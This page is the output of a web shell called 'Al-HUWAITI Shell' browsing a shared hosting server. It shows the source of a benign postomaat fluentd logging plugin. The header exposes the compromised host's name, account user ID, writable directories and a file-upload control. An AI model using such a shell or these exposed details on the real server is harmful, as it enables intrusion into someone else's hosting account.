Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User : u595547767 ( 595547767)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /opt/alt/python27/lib/python2.7/site-packages/postomaat/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/alt/python27/lib/python2.7/site-packages/postomaat/plugins/fluentd_writer.py
# -*- coding: UTF-8 -*-
#   Copyright 2012-2018 Oli Schacher
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
#
import time
from ConfigParser import NoOptionError
from postomaat.shared import ScannerPlugin, DUNNO

try:
    from fluent import sender
    FLUENT_AVAILABLE = True
except ImportError:
    FLUENT_AVAILABLE = False


class Event(object):
    def __init__(self, label, data, **kwargs):
        self.data = data
        assert isinstance(self.data, dict), 'data must be a dict'
        self.label = label
        self.sender_ = kwargs.get('sender', sender.get_global_sender())
        self.timestamp = kwargs.get('time', int(time.time()))

    def send(self):
        return self.sender_.emit_with_time(self.label, self.timestamp, self.data)


class FluentWriter(ScannerPlugin):
    def __init__(self, config, section=None):
        ScannerPlugin.__init__(self, config, section)
        self.logger = self._logger()
        self.requiredvars = {
            'host': {
                'default': None,
                'description': 'Where to connect to fluentd. Local connecion if not specified.'
            },
            'port': {
                'default': '24224',
                'description': 'TCP port to send events to'
            },
            'tag': {
                'default': 'postomaat.stats',
                'description': 'Tag events sent to fluetnd'
            },
            'fields': {
                'default': 'from_address to_address from_domain to_domain size',
                'description': 'Field names or maps that should be exported'
            }
        }
        self.fieldmap = {}
        self.fields_to_lower = [
            'from_address',
            'from_domain',
            'to_address',
            'to_domain',
            'sender',
            'recipient',
            'sasl_sender',
            'sasl_username',
            'sasl_user'
        ]

        try:
            host = self.config.get(self.section, 'host')
        except NoOptionError:
            host = None
        self.host = host

        try:
            port = self.config.getint(self.section, 'port')
        except NoOptionError:
            port = 24224
        self.port = port

        try:
            tag = self.config.get(self.section, 'tag')
        except NoOptionError:
            tag = 'postomaat.stats'
        self.tag = tag

    def connect(self):
        if sender.get_global_sender() is not None:
            return

        kw = {}
        kw['host'] = self.host
        kw['port'] = self.port
        tag = self.tag

        if 'host' not in kw:
            del kw['port']
        if 'host' in kw and kw['host'] is None:
            del kw['host']
            del kw['port']

        sender.setup(tag=tag, **kw)

    def get_fieldmap(self):
        """Create the mapping from attribute names to field names based on the config string
        by default, fluentd field name is the same as Postfix Policy attribute name,
        but, to override the mapping, the config can be in the form:

        postfix_attribute:fluentd_field

        Attribute is any name that is available in the suspect object.
        That is:
        - it's an attribute name in Postix Policy protocol
        - it was appended to suspect object by previous plugins

        eg.
        fields=to_address to_domain from_address:sender from_domain:senderdomain size
        """

        configstring = self.config.get(self.section, 'fields')
        fields = configstring.split()

        fieldmap = {}
        for field in fields:
            if ':' in field:
                (tag, column) = field.split(':', 1)
                fieldmap[column] = tag
            else:
                fieldmap[field] = field
        return fieldmap

    def build_event_data(self, suspect, fieldmap):
        event_data = {}
        for fluent_field, postfix_attr in fieldmap.items():

            if postfix_attr == 'from_address':
                suspect_attribute = suspect.from_address
            elif postfix_attr == 'from_domain':
                suspect_attribute = suspect.from_domain
            elif postfix_attr == 'to_address':
                suspect_attribute = suspect.to_address
            elif postfix_attr == 'to_domain':
                suspect_attribute = suspect.to_domain
            else:
                suspect_attribute = suspect.get_value(postfix_attr)

            if suspect_attribute is not None:
                event_data[fluent_field] = suspect_attribute
            elif postfix_attr in suspect.tags:
                event_data[fluent_field] = suspect.tags[fluent_field]
            else:
                self.logger.warning("Suspect does not have attribute %s. Typo or missing plugin?",
                                    postfix_attr)
                event_data[fluent_field] = None
        return self.normalized_event_fields(event_data)

    def normalized_event_fields(self, event_data):
        for field, _ in event_data.items():
            if field in self.fields_to_lower:
                try:
                    event_data[field] = event_data[field].lower()
                except AttributeError:
                    pass
        return event_data

    def lint(self):
        lint_ok = True

        if not self.check_config():
            print('Error checking config')
            lint_ok = False

        if not FLUENT_AVAILABLE:
            print("fluent-logger module is not installed")
            lint_ok = False

        if FLUENT_AVAILABLE:
            try:
                self.connect()
                gs = sender.get_global_sender()
                gs._reconnect()
            except Exception as ex:
                error = type(ex).__name__, ex.message
                print("Failed to connect to FluentD {}".format(str(error)))
                lint_ok = False

        return lint_ok

    def examine(self, suspect):
        try:
            self.connect()
            self.fieldmap = self.get_fieldmap()
            data = self.build_event_data(suspect, self.fieldmap)
            fleuntd_event = Event(None, data)

            # socket.error Exception is tainted in fluent.sender._send_internal
            if not fleuntd_event.send():
                raise Exception('Failed to send event to fluentd, probably socket error')
        except Exception as ex: # pylint: disable=W0703
            error = type(ex).__name__, ex.message
            self.logger.error("FluentD Writer plugin failed, log not written: %s", str(error))

        return DUNNO

    def __str__(self):
        return "FluentD Writer Plugin"

Al-HUWAITI Shell